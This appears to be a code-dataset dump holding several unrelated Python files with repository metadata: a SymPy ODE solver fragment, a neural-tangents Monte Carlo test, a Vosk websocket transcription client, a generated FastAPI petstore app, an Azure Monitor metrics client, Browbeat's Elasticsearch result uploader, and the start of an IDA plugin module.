u, v, w = symbols('u, v, w')
fu, fv, fw = symbols('u, v, w', cls=Function)
p = Wild('p', exclude=[x(t), y(t), z(t), t])
q = Wild('q', exclude=[x(t), y(t), z(t), t])
s = Wild('s', exclude=[x(t), y(t), z(t), t])
F1, F2, F3 = symbols('F1, F2, F3', cls=Wild)
r1 = eq[0].match(diff(x(t), t) - x(t)*F2 + x(t)*F3)
r = collect_const(r1[F2]).match(s*F2)
r.update(collect_const(r1[F3]).match(q*F3))
if eq[1].has(r[F2]) and not eq[1].has(r[F3]):
r[F2], r[F3] = r[F3], r[F2]
r[s], r[q] = -r[q], -r[s]
r.update((diff(y(t), t) - eq[1]).match(y(t)*(p*r[F3] - r[s]*F1)))
a = r[p]; b = r[q]; c = r[s]
F1 = r[F1].subs(x(t), u).subs(y(t), v).subs(z(t), w)
F2 = r[F2].subs(x(t), u).subs(y(t), v).subs(z(t), w)
F3 = r[F3].subs(x(t), u).subs(y(t), v).subs(z(t), w)
x_yz = (C1*v**-b*w**-c)**-a
y_zx = (C1*w**-c*u**-a)**-b
z_xy = (C1*u**-a*v**-b)**-c
y_x = dsolve(diff(fv(u), u) - ((v*(a*F3 - c*F1))/(u*(c*F2 - b*F3))).subs(w, z_xy).subs(v, fv(u))).rhs
z_x = dsolve(diff(fw(u), u) - ((w*(b*F1 - a*F2))/(u*(c*F2 - b*F3))).subs(v, y_zx).subs(w, fw(u))).rhs
z_y = dsolve(diff(fw(v), v) - ((w*(b*F1 - a*F2))/(v*(a*F3 - c*F1))).subs(u, x_yz).subs(w, fw(v))).rhs
x_y = dsolve(diff(fu(v), v) - ((u*(c*F2 - b*F3))/(v*(a*F3 - c*F1))).subs(w, z_xy).subs(u, fu(v))).rhs
y_z = dsolve(diff(fv(w), w) - ((v*(a*F3 - c*F1))/(w*(b*F1 - a*F2))).subs(u, x_yz).subs(v, fv(w))).rhs
x_z = dsolve(diff(fu(w), w) - ((u*(c*F2 - b*F3))/(w*(b*F1 - a*F2))).subs(v, y_zx).subs(u, fu(w))).rhs
sol1 = dsolve(diff(fu(t), t) - (u*(c*F2 - b*F3)).subs(v, y_x).subs(w, z_x).subs(u, fu(t))).rhs
sol2 = dsolve(diff(fv(t), t) - (v*(a*F3 - c*F1)).subs(u, x_y).subs(w, z_y).subs(v, fv(t))).rhs
sol3 = dsolve(diff(fw(t), t) - (w*(b*F1 - a*F2)).subs(u, x_z).subs(v, y_z).subs(w, fw(t))).rhs
return [sol1, sol2, sol3]
#This import is written at the bottom to avoid circular imports.
from .single import (NthAlgebraic, Factorable, FirstLinear, AlmostLinear,
Bernoulli, SingleODEProblem, SingleODESolver, RiccatiSpecial)
| 39.039166
| 256
| 0.560834
|
7a5115d8cc0dc7569d64dd2bc9cef714afccc648
| 10,560
|
py
|
Python
|
tests/monte_carlo_test.py
|
DarrenZhang01/Neural_Tangents_TensorFlow
|
2fd360c8b1b8c9106044034f6a8b5c2734db9c3d
|
[
"Apache-2.0"
] | 4
|
2020-12-25T17:37:13.000Z
|
2022-01-03T17:00:23.000Z
|
tests/monte_carlo_test.py
|
DarrenZhang01/TensorFlow_GSoC
|
2fd360c8b1b8c9106044034f6a8b5c2734db9c3d
|
[
"Apache-2.0"
] | 33
|
2020-07-18T18:57:54.000Z
|
2020-08-17T13:58:46.000Z
|
tests/monte_carlo_test.py
|
DarrenZhang01/Neural_Tangents_TensorFlow
|
2fd360c8b1b8c9106044034f6a8b5c2734db9c3d
|
[
"Apache-2.0"
] | 1
|
2021-08-16T19:00:06.000Z
|
2021-08-16T19:00:06.000Z
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for `utils/monte_carlo.py`."""
from absl.testing import absltest
from jax import test_util as jtu
from jax.config import config as jax_config
from jax.lib import xla_bridge
import tensorflow as tf
from tensorflow.python.ops import numpy_ops as np
from stateless_random_ops import split as tf_random_split
from stateless_random_ops import stateless_random_normal as normal
from tensorflow.random import stateless_uniform
from neural_tangents import stax
from neural_tangents.utils import batch
from neural_tangents.utils import empirical
from neural_tangents.utils import monte_carlo
from neural_tangents.utils import test_utils
jax_config.parse_flags_with_absl()
BATCH_SIZES = [
1,
2,
4,
]
DEVICE_COUNTS = [0, 1, 2]
STORE_ON_DEVICE = [True, False]
N_SAMPLES = 4
ALL_GET = ('nngp', 'ntk', ('nngp', 'ntk'), None)
test_utils.update_test_tolerance()
def _get_inputs_and_model(width=1, n_classes=2, use_conv=True):
key = stateless_uniform(shape=[2], seed=[1, 1], minval=None, maxval=None, dtype=tf.int32)
keys = tf_random_split(key)
key = keys[0]
split = keys[1]
x1 = np.asarray(normal((8, 4, 3, 2), seed=key))
x2 = np.asarray(normal((4, 4, 3, 2), seed=split))
if not use_conv:
x1 = np.reshape(x1, (x1.shape[0], -1))
x2 = np.reshape(x2, (x2.shape[0], -1))
init_fn, apply_fn, kernel_fn = stax.serial(
stax.Conv(width, (3, 3)) if use_conv else stax.Dense(width),
stax.Relu(),
stax.Flatten(),
stax.Dense(n_classes, 2., 0.5))
return x1, x2, init_fn, apply_fn, kernel_fn, key
class MonteCarloTest(jtu.JaxTestCase):
@jtu.parameterized.named_parameters(
jtu.cases_from_list({
'testcase_name': '[batch_size={}, '
'device_count={} '
'store_on_device={} '
'get={} '
']'.format(batch_size,
device_count,
store_on_device,
get),
'batch_size': batch_size,
'device_count': device_count,
'store_on_device': store_on_device,
'get': get,
} for batch_size in BATCH_SIZES for device_count in DEVICE_COUNTS
for store_on_device in STORE_ON_DEVICE
for get in ALL_GET))
def test_sample_once_batch(self, batch_size, device_count, store_on_device,
get):
test_utils.stub_out_pmap(batch, device_count)
x1, x2, init_fn, apply_fn, _, key = _get_inputs_and_model()
kernel_fn = empirical.empirical_kernel_fn(apply_fn)
sample_once_fn = monte_carlo._sample_once_kernel_fn(kernel_fn, init_fn)
sample_once_batch_fn = monte_carlo._sample_once_kernel_fn(
kernel_fn, init_fn, batch_size, device_count, store_on_device)
one_sample = sample_once_fn(x1, x2, key, get)
one_sample_batch = sample_once_batch_fn(x1, x2, key, get)
self.assertAllClose(one_sample, one_sample_batch)
@jtu.parameterized.named_parameters(
jtu.cases_from_list({
'testcase_name': '[batch_size={}, '
'device_count={} '
'store_on_device={} '
'get={} '
']'.format(batch_size, device_count, store_on_device,
get),
'batch_size': batch_size,
'device_count': device_count,
'store_on_device': store_on_device,
'get': get,
} for batch_size in BATCH_SIZES for device_count in DEVICE_COUNTS
for store_on_device in STORE_ON_DEVICE
for get in ALL_GET))
def test_batch_sample_once(self, batch_size, device_count, store_on_device,
get):
test_utils.stub_out_pmap(batch, device_count)
x1, x2, init_fn, apply_fn, _, key = _get_inputs_and_model()
kernel_fn = empirical.empirical_kernel_fn(apply_fn)
sample_once_fn = monte_carlo._sample_once_kernel_fn(
kernel_fn, init_fn, device_count=0)
batch_sample_once_fn = batch.batch(sample_once_fn, batch_size,
device_count, store_on_device)
one_sample = sample_once_fn(x1, x2, key, get)
one_batch_sample = batch_sample_once_fn(x1, x2, key, get)
self.assertAllClose(one_sample, one_batch_sample)
@jtu.parameterized.named_parameters(
jtu.cases_from_list({
'testcase_name': '[batch_size={}, '
'device_count={} '
'store_on_device={} '
']'.format(batch_size, device_count, store_on_device
),
'batch_size': batch_size,
'device_count': device_count,
'store_on_device': store_on_device,
} for batch_size in BATCH_SIZES for device_count in DEVICE_COUNTS
for store_on_device in STORE_ON_DEVICE))
def test_sample_vs_analytic_nngp(self, batch_size, device_count,
store_on_device):
test_utils.stub_out_pmap(batch, device_count)
x1, x2, init_fn, apply_fn, stax_kernel_fn, key = _get_inputs_and_model(
1024, 256, xla_bridge.get_backend().platform == 'tpu')
sample = monte_carlo.monte_carlo_kernel_fn(init_fn, apply_fn, key, 200,
batch_size, device_count,
store_on_device)
ker_empirical = sample(x1, x2, 'nngp')
ker_analytic = stax_kernel_fn(x1, x2, 'nngp')
test_utils.assert_close_matrices(self, ker_analytic, ker_empirical, 2e-2)
@jtu.parameterized.named_parameters(
jtu.cases_from_list({
'testcase_name': '[batch_size={}, '
'device_count={} '
'store_on_device={} '
']'.format(batch_size, device_count, store_on_device
),
'batch_size': batch_size,
'device_count': device_count,
'store_on_device': store_on_device,
} for batch_size in BATCH_SIZES for device_count in DEVICE_COUNTS
for store_on_device in STORE_ON_DEVICE))
def test_monte_carlo_vs_analytic_ntk(self, batch_size, device_count,
store_on_device):
test_utils.stub_out_pmap(batch, device_count)
x1, x2, init_fn, apply_fn, stax_kernel_fn, key = _get_inputs_and_model(
256, 2, xla_bridge.get_backend().platform == 'tpu')
sample = monte_carlo.monte_carlo_kernel_fn(init_fn, apply_fn, key, 100,
batch_size, device_count,
store_on_device)
ker_empirical = sample(x1, x2, 'ntk')
ker_analytic = stax_kernel_fn(x1, x2, 'ntk')
test_utils.assert_close_matrices(self, ker_analytic, ker_empirical, 2e-2)
@jtu.parameterized.named_parameters(
jtu.cases_from_list({
'testcase_name': '[batch_size={}, '
'device_count={} '
'store_on_device={} '
'get={}'
']'.format(batch_size, device_count, store_on_device,
get),
'batch_size': batch_size,
'device_count': device_count,
'store_on_device': store_on_device,
'get': get
} for batch_size in BATCH_SIZES for device_count in DEVICE_COUNTS
for store_on_device in STORE_ON_DEVICE
for get in ALL_GET))
def test_monte_carlo_generator(self, batch_size, device_count,
store_on_device, get):
test_utils.stub_out_pmap(batch, device_count)
x1, x2, init_fn, apply_fn, stax_kernel_fn, key = _get_inputs_and_model(8, 1)
x3, x4, _, _, _, _ = _get_inputs_and_model(8, 1)
log_n_max = 4
n_samples = [2**k for k in range(log_n_max)]
sample_generator = monte_carlo.monte_carlo_kernel_fn(
init_fn, apply_fn, key, n_samples, batch_size, device_count,
store_on_device)
if get is None:
samples_12 = sample_generator(x1, x2)
samples_34 = sample_generator(x3, x4)
count = 0
for n, s_12, s_34 in zip(n_samples, samples_12, samples_34):
sample_fn = monte_carlo.monte_carlo_kernel_fn(init_fn, apply_fn, key,
n, batch_size,
device_count,
store_on_device)
sample_12 = sample_fn(x1, x2)
sample_34 = sample_fn(x3, x4)
self.assertAllClose(s_12, sample_12)
self.assertAllClose(s_12, s_34)
self.assertAllClose(s_12, sample_34)
count += 1
self.assertEqual(log_n_max, count)
ker_analytic_12 = stax_kernel_fn(x1, x2, ('nngp', 'ntk'))
ker_analytic_34 = stax_kernel_fn(x3, x4, ('nngp', 'ntk'))
else:
samples_12 = sample_generator(x1, x2, get)
samples_34 = sample_generator(x3, x4, get)
count = 0
for n, s_12, s_34 in zip(n_samples, samples_12, samples_34):
sample_fn = monte_carlo.monte_carlo_kernel_fn(
init_fn, apply_fn, key, n, batch_size,
device_count, store_on_device)
sample_12 = sample_fn(x1, x2, get)
sample_34 = sample_fn(x3, x4, get)
self.assertAllClose(s_12, sample_12)
self.assertAllClose(s_12, s_34)
self.assertAllClose(s_12, sample_34)
count += 1
self.assertEqual(log_n_max, count)
ker_analytic_12 = stax_kernel_fn(x1, x2, get)
ker_analytic_34 = stax_kernel_fn(x3, x4, get)
self.assertAllClose(ker_analytic_12, s_12, atol=2., rtol=2.)
self.assertAllClose(ker_analytic_12, ker_analytic_34)
if __name__ == '__main__':
absltest.main()
| 39.550562
| 91
| 0.61108
|
8a70aa657e21622afe49b2fe1e53c11166610e76
| 2,443
|
py
|
Python
|
test/asr-test.py
|
format37/vosk-api-gpu
|
05e5130b6deea320fe2967937de5006a7298f024
|
[
"Apache-2.0"
] | null | null | null |
test/asr-test.py
|
format37/vosk-api-gpu
|
05e5130b6deea320fe2967937de5006a7298f024
|
[
"Apache-2.0"
] | null | null | null |
test/asr-test.py
|
format37/vosk-api-gpu
|
05e5130b6deea320fe2967937de5006a7298f024
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# https://raw.githubusercontent.com/alphacep/vosk-server/master/client-samples/python/asr-test.py
import asyncio
import websockets
import sys
import os
import datetime
import pickle
import json
if len(sys.argv) != 4:
print('Wrong parameters count. Please pass:')
print('1. Count of files to test')
print('2. path to files')
print('3. server address')
exit()
time_start = datetime.datetime.now()
files_data = {}
async def hello(uri):
async with websockets.connect(uri) as websocket:
def get_files(path):
for root, dirs, files in os.walk(path):
files.sort()
return files
counter = 0
with open('transcribation.txt', 'w') as textfile:
for file in get_files(sys.argv[2]):
#phrases = transcribe_vosk(sys.argv[1]+'/'+file, model)
counter += 1
if counter > int(sys.argv[1]):
break
print(' = = [',counter,'] = =',file)
wf = open(sys.argv[2]+file, "rb")
file_data = []
textfile.write('=== '+str(file)+'\n')
while True:
data = wf.read(8000)
if len(data) == 0:
break
await websocket.send(data)
accept = json.loads(await websocket.recv())
#file_data.append(accept)
if len(accept)>1 and accept['text'] != '':
file_data.append(accept['text'])
textfile.write(str(accept['text'])+'\n')
else:
[[key, value]] = accept.items()
if key == 'text' and len(value):
file_data.append(value)
textfile.write(str(value)+'\n')
#print (await websocket.recv())
files_data[file] = file_data
await websocket.send('{"eof" : 1}')
print (await websocket.recv())
asyncio.get_event_loop().run_until_complete(
hello('ws://'+sys.argv[3]+':2700'))
time_end = datetime.datetime.now()
print('spent', (time_end - time_start).seconds, 'seconds')
pickle.dump(files_data, file=open('files_data.pickle', 'wb'))
print('job complete!')
| 30.5375
| 97
| 0.496521
|
a634cfd7782fae44d40c51c590c50cf7b60b9819
| 1,498
|
py
|
Python
|
tests/data/expected/openapi/remote_ref/body_and_parameters/main.py
|
sondrelg/fastapi-code-generator
|
6080b31b18bcf34708b821f9de709af77c05592b
|
[
"MIT"
] | null | null | null |
tests/data/expected/openapi/remote_ref/body_and_parameters/main.py
|
sondrelg/fastapi-code-generator
|
6080b31b18bcf34708b821f9de709af77c05592b
|
[
"MIT"
] | null | null | null |
tests/data/expected/openapi/remote_ref/body_and_parameters/main.py
|
sondrelg/fastapi-code-generator
|
6080b31b18bcf34708b821f9de709af77c05592b
|
[
"MIT"
] | null | null | null |
# generated by fastapi-codegen:
# filename: body_and_parameters.yaml
# timestamp: 2020-06-19T00:00:00+00:00
from __future__ import annotations
from typing import List, Optional
from fastapi import FastAPI, Query
from .models import Pet, PetForm
app = FastAPI(version="1.0.0", title="Swagger Petstore", license="{'name': 'MIT'}",)
@app.get('/foo', response_model=str)
def get_foo(foo: Optional[str] = None) -> str:
pass
@app.post('/food', response_model=None)
def post_food(body: str) -> None:
"""
Create a food
"""
pass
@app.get('/food/{food_id}', response_model=List[int])
def show_food_by_id(
food_id: str, message_texts: Optional[List[str]] = None
) -> List[int]:
"""
Info for a specific pet
"""
pass
@app.get('/pets', response_model=List[Pet])
def list_pets(
limit: Optional[int] = 0,
home_address: Optional[str] = Query('Unknown', alias='HomeAddress'),
kind: Optional[str] = 'dog',
) -> List[Pet]:
"""
List all pets
"""
pass
@app.post('/pets', response_model=None)
def post_pets(body: PetForm) -> None:
"""
Create a pet
"""
pass
@app.get('/pets/{pet_id}', response_model=Pet)
def show_pet_by_id(pet_id: str = Query(..., alias='petId')) -> Pet:
"""
Info for a specific pet
"""
pass
@app.put('/pets/{pet_id}', response_model=None)
def put_pets_pet_id(
pet_id: str = Query(..., alias='petId'), body: PetForm = None
) -> None:
"""
update a pet
"""
pass
| 19.973333
| 84
| 0.626168
|
a16847bb3ecd913304f793ad4e7cac041465b05c
| 6,981
|
py
|
Python
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/operations/_metrics_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 3
|
2020-06-23T02:25:27.000Z
|
2021-09-07T18:48:11.000Z
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/operations/_metrics_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 510
|
2019-07-17T16:11:19.000Z
|
2021-08-02T08:38:32.000Z
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/operations/_metrics_operations.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 5
|
2019-09-04T12:51:37.000Z
|
2020-09-16T07:28:40.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class MetricsOperations:
"""MetricsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~$(python-base-namespace).v2016_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_uri: str,
filter: Optional[str] = None,
**kwargs
) -> AsyncIterable["_models.MetricCollection"]:
"""Lists the metric values for a resource.
:param resource_uri: The identifier of the resource.
:type resource_uri: str
:param filter: Reduces the set of data collected.:code:`<br>`The filter is optional. If present
it must contain a list of metric names to retrieve of the form: *(name.value eq 'metricName'
[or name.value eq 'metricName' or ...])*. Optionally, the filter can contain conditions for the
following attributes *aggregationType*\ , *startTime*\ , *endTime*\ , and *timeGrain* of the
form *attributeName operator value*. Where operator is one of *ne*\ , *eq*\ , *gt*\ ,
*lt*.:code:`<br>`Several conditions can be combined with parentheses and logical operators,
e.g: *and*\ , *or*.:code:`<br>`Some example filter expressions are::code:`<br>`-
$filter=(name.value eq 'RunsSucceeded') and aggregationType eq 'Total' and startTime eq
2016-02-20 and endTime eq 2016-02-21 and timeGrain eq duration'PT1M',:code:`<br>`-
$filter=(name.value eq 'RunsSucceeded') and (aggregationType eq 'Total' or aggregationType eq
'Average') and startTime eq 2016-02-20 and endTime eq 2016-02-21 and timeGrain eq
duration'PT1H',:code:`<br>`- $filter=(name.value eq 'ActionsCompleted' or name.value eq
'RunsSucceeded') and (aggregationType eq 'Total' or aggregationType eq 'Average') and startTime
eq 2016-02-20 and endTime eq 2016-02-21 and timeGrain eq
duration'PT1M'.:code:`<br>`:code:`<br>`\ **NOTE**\ : When a metrics query comes in with
multiple metrics, but with no aggregation types defined, the service will pick the Primary
aggregation type of the first metrics to be used as the default aggregation type for all the
metrics.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MetricCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~$(python-base-namespace).v2016_09_01.models.MetricCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.MetricCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceUri': self._serialize.url("resource_uri", resource_uri, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('MetricCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/{resourceUri}/providers/microsoft.insights/metrics'} # type: ignore
| 51.711111
| 133
| 0.655493
|
3021df6211382bc8814047a52bc9ca3af7e7ffd4
| 13,001
|
py
|
Python
|
browbeat/elastic.py
|
jsitnicki/browbeat
|
f5f9dcef2375a28fed8cc97f973eeecabd2114b7
|
[
"Apache-2.0"
] | null | null | null |
browbeat/elastic.py
|
jsitnicki/browbeat
|
f5f9dcef2375a28fed8cc97f973eeecabd2114b7
|
[
"Apache-2.0"
] | null | null | null |
browbeat/elastic.py
|
jsitnicki/browbeat
|
f5f9dcef2375a28fed8cc97f973eeecabd2114b7
|
[
"Apache-2.0"
] | 1
|
2019-12-01T14:35:28.000Z
|
2019-12-01T14:35:28.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import deque
import datetime
import json
import logging
import os
import re
import sys
import time
import uuid
import elasticsearch
from elasticsearch import helpers
browbeat_uuid = uuid.uuid4()
class Elastic(object):
def __init__(self, config, workload, tool="browbeat", cache_size=1000, max_cache_time=10):
self.config = config
self.cache = deque()
self.max_cache_size = cache_size
self.last_upload = datetime.datetime.utcnow()
self.max_cache_age = datetime.timedelta(minutes=max_cache_time)
self.logger = logging.getLogger('browbeat.elastic')
self.es = elasticsearch.Elasticsearch([
{'host': self.config['elasticsearch']['host'],
'port': self.config['elasticsearch']['port']}],
send_get_body_as='POST'
)
self.workload = workload
today = datetime.datetime.today()
self.index = "{}-{}-{}".format(tool,
workload, today.strftime('%Y.%m.%d'))
def __del__(self):
self.flush_cache()
def load_json(self, result):
json_data = None
self.logger.info("Loading JSON")
json_data = json.loads(result)
return json_data
def load_json_file(self, result):
json_data = None
self.logger.info("Loading JSON file : {}".format(result))
try:
with open(result) as jdata:
json_data = json.load(jdata)
except (IOError, OSError):
self.logger.error("Error loading JSON file : {}".format(result))
return False
return json_data
def combine_metadata(self, result):
if (self.config['elasticsearch']['metadata_files'] is not None and
len(self.config['elasticsearch']['metadata_files']) > 0):
meta = self.config['elasticsearch']['metadata_files']
for _meta in meta:
try:
with open(_meta['file']) as jdata:
result[_meta['name']] = json.load(jdata)
except Exception:
self.logger.error(
"Error loading Metadata file : {}".format(
_meta['file']))
self.logger.error(
"Please make sure the metadata file exists and"
" is valid JSON or run the playbook ansible/gather/site.yml"
" before running the Browbeat test Suite")
sys.exit(1)
return result
# Used to transform the cache dict into a elastic insertable iterable
def cache_insertable_iterable(self):
output = deque()
for item in self.cache:
es_item = {}
es_item['_id'] = item['_id']
es_item['_source'] = item['result']
es_item['_type'] = item['_type']
es_item['_index'] = self.index
output.append(es_item)
return output
def flush_cache(self):
if len(self.cache) == 0:
return True
retry = 2
for i in range(retry):
try:
to_upload = helpers.parallel_bulk(self.es,
self.cache_insertable_iterable())
counter = 0
num_items = len(self.cache)
for item in to_upload:
self.logger.debug("{} of {} Elastic objects uploaded".format(num_items,
counter))
counter = counter + 1
output = "Pushed {} items to Elasticsearch to index {}".format(num_items,
self.index)
output += " and browbeat UUID {}".format(str(browbeat_uuid))
self.logger.info(output)
self.cache = deque()
self.last_upload = datetime.datetime.utcnow()
return True
except Exception as Err:
self.logger.error(
"Error pushing data to Elasticsearch, going to retry"
" in 10 seconds")
self.logger.error("Exception: {}".format(Err))
time.sleep(10)
if i == (retry - 1):
self.logger.error("Pushing Data to Elasticsearch failed in spite of retry,"
" dumping JSON for {} cached items".format(len(self.cache)))
for item in self.cache:
filename = item['test_name'] + '-' + item['identifier']
filename += '-elastic' + '.' + 'json'
elastic_file = os.path.join(item['result_dir'],
filename)
with open(elastic_file, 'w') as result_file:
json.dump(item['result'],
result_file,
indent=4,
sort_keys=True)
self.logger.info("Saved Elasticsearch consumable result JSON to {}".
format(elastic_file))
self.cache = deque()
self.last_upload = datetime.datetime.utcnow()
return False
def get_software_metadata(self, index, role, browbeat_uuid):
nodes = {}
results = self.query_uuid(index, browbeat_uuid)
pattern = re.compile(".*{}.*".format(role))
if results:
for result in results:
for metadata in result['_source']['software-metadata']:
for service in metadata:
if pattern.match(metadata[service]['node_name']):
if metadata[service]['node_name'] not in nodes:
nodes[metadata[service][
'node_name']] = metadata
return nodes
else:
self.logger.error("UUID {} wasn't found".format(browbeat_uuid))
return False
def get_version_metadata(self, index, browbeat_uuid):
version = {}
results = self.query_uuid(index, browbeat_uuid)
if results:
for result in results:
version = result['_source']['version']
return version
else:
self.logger.error("UUID {} wasn't found".format(browbeat_uuid))
"""
Currently this function will only compare two uuids. I (rook) am not convinced it is worth
the effort to engineer anything > 2.
"""
def compare_metadata(self, index, role, uuids):
meta = []
for browbeat_uuid in uuids:
self.logger.info(
"Querying Elastic : index [{}] : role [{}] : browbeat_uuid [{}] ".format(
index, role, browbeat_uuid))
software_metadata = self.get_software_metadata(
index, role, browbeat_uuid)
if software_metadata:
meta.append(software_metadata)
else:
return False
version_metadata = self.get_version_metadata(index, browbeat_uuid)
if version_metadata:
self.logger.info(
"\nUUID: {}\nVersion: {}\nBuild: {}".format(
browbeat_uuid,
version_metadata['osp_series'],
version_metadata['build']))
ignore = [
"connection",
"admin_url",
"bind_host",
"rabbit_hosts",
"auth_url",
"public_bind_host",
"host",
"key",
"url",
"auth_uri",
"coordination_url",
"swift_authurl",
"admin_token",
"memcached_servers",
"api_servers",
"osapi_volume_listen",
"nova_url",
"coordination_url",
"memcache_servers",
"novncproxy_host",
"backend_url",
"novncproxy_base_url",
"metadata_listen",
"osapi_compute_listen",
"admin_bind_host",
"glance_api_servers",
"iscsi_ip_address",
"registry_host",
"auth_address",
"swift_key",
"auth_encryption_key",
"metadata_proxy_shared_secret",
"telemetry_secret",
"heat_metadata_server_url",
"heat_waitcondition_server_url",
"transport_url"]
if len(meta) < 2:
self.logger.error("Unable to compare data-sets")
return False
for host in meta[0]:
if host not in meta[1]:
self.logger.error("Deployment differs: "
"Host [{}] missing ".format(host))
continue
for service in meta[0][host]:
for options in meta[0][host][service].keys():
if options not in meta[1][host][service]:
self.logger.error(
"UUID {} "
"- Missing Option : "
"Host [{}] Service [{}] {}".format(
uuids[1], host, service, options))
continue
if isinstance(meta[0][host][service][options], dict):
for key in meta[0][host][service][options].keys():
if key not in ignore:
if key in meta[1][host][service][options]:
value = meta[0][host][
service][options][key]
new_value = meta[1][host][
service][options][key]
if value != new_value:
self.logger.info(
"Difference found : "
"Host [{}] Service [{}] Section {} {} [{}]\n"
"New Value: {}\nOld Value: {}".format(
host,
service,
options,
key,
meta[0][host][service][
options][key],
value,
new_value))
else:
self.logger.error(
"UUID {} - Missing Value : "
"Host [{}] Service [{}] {} [{}]".format(
uuids[1], host, service, options, key))
def query_uuid(self, index, browbeat_uuid):
body = {'query': {"match": {"browbeat_uuid": {
"query": browbeat_uuid, "type": "phrase"}}}}
results = self.es.search(index=index, doc_type='result', body=body)
if len(results['hits']['hits']) > 0:
return results['hits']['hits']
else:
return False
def index_result(self,
result,
test_name,
result_dir,
identifier='',
_type='result',
_id=None):
data = {}
result['browbeat_uuid'] = str(browbeat_uuid)
result['cloud_name'] = self.config['browbeat']['cloud_name']
result['browbeat_config'] = self.config
data['result'] = result
data['test_name'] = test_name
data['result_dir'] = result_dir
data['identifier'] = identifier
data['_type'] = _type
data['_id'] = _id
self.cache.append(data)
now = datetime.datetime.utcnow()
if (len(self.cache) <= self.max_cache_size and
(now - self.last_upload) <= self.max_cache_age):
return True
else:
return self.flush_cache()
| 41.404459
| 98
| 0.474117
|
16998aafe3ee63cf494d30333664fff295995324
| 2,675
|
py
|
Python
|
pkg/main.py
|
bruce30262/idapkg
|
5d6af9bd59c5dc886d68335119fae41491f06ea7
|
[
"MIT"
] | 125
|
2019-04-04T22:54:53.000Z
|
2021-12-15T02:13:12.000Z
|
pkg/main.py
|
bruce30262/idapkg
|
5d6af9bd59c5dc886d68335119fae41491f06ea7
|
[
"MIT"
] | 19
|
2019-04-02T15:56:37.000Z
|
2022-03-17T09:12:52.000Z
|
pkg/main.py
|
Jinmo/pm
|
5d6af9bd59c5dc886d68335119fae41491f06ea7
|
[
"MIT"
] | 14
|
2019-05-29T17:31:08.000Z
|
2021-09-26T01:34:42.000Z
|
import os
import ida_diskio
from . import __version__
from .config import g
